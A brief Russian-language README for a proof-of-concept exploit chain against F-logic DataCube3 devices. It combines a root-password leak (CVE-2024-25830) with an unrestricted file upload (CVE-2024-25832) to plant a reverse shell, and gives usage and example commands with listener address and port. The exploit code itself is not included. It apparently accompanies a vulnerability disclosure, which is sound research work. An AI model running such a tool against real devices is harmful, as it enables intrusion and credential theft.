
PoC-скрипт для CVE-2024-25832: Цепочка эксплойтов для обратного shell, раскрытие информации (утечка пароля root) + неограниченная загрузка файлов в DataCube3
Этот репозиторий содержит доказательство концепции (PoC) для двухэтапной цепочки эксплойтов, нацеленной на устройства DataCube3. Он объединяет CVE-2024-25830 (неправильный контроль доступа) для извлечения паролей root и CVE-2024-25832 (неограниченная загрузка файлов) для развертывания скрипта обратного шелла. Данный PoC дополняет подробный анализ уязвимостей в статье блога «DataCube3 Vulnerability Report».
Все устройства F-logic DataCube3 версии 1.0.
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

ТОЛЬКО В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ.